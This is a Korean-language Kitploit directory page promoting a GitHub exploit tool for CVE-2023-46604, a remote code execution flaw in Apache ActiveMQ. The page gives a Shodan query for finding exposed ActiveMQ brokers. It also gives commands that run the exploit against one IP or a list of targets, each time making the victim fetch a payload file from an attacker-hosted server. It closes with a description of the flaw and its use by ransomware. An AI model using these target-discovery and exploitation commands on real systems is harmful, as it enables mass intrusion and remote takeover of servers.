Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-46604 — CVE-2023-46604용 익스플로잇 | Kitploit
도구/GitHubGitHub/mrpentst/cve-2023-46604
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmrpentst/cve-2023-46604

CVE-2023-46604

CVE-2023-46604용 익스플로잇

저장소 보기
222년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-46604

CVE-2023-46604용 익스플로잇

이 도구는 이 취약점을 악용하는 데 도움을 줍니다.

대상을 찾기 위한 Shodan 쿼리:

root@kitploit:~
product:"ActiveMQ" port:"61616"

도구 사용법:

root@kitploit:~
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml

이 CVE 정보:

CVE-2023-46604는 오픈소스 메시지 브로커 소프트웨어인 Apache ActiveMQ의 심각한 원격 코드 실행 취약점입니다. 이 취약점을 통해 Java 기반 OpenWire 브로커 또는 클라이언트에 네트워크 접근 권한이 있는 원격 공격자가 임의의 셸 명령을 실행할 수 있습니다. 이는 OpenWire 프로토콜에서 직렬화된 클래스 유형을 조작하여 브로커가 클래스패스의 모든 클래스를 인스턴스화하도록 함으로써 달성됩니다. 이 취약점은 Apache ActiveMQ 내부의 안전하지 않은 역직렬화로 인해 발생하며, HelloKitty 랜섬웨어 계열을 포함한 공격자들이 랜섬웨어 바이너리를 실행하고 시스템을 완전히 손상시키는 데 악용되었습니다.

도구 다운로드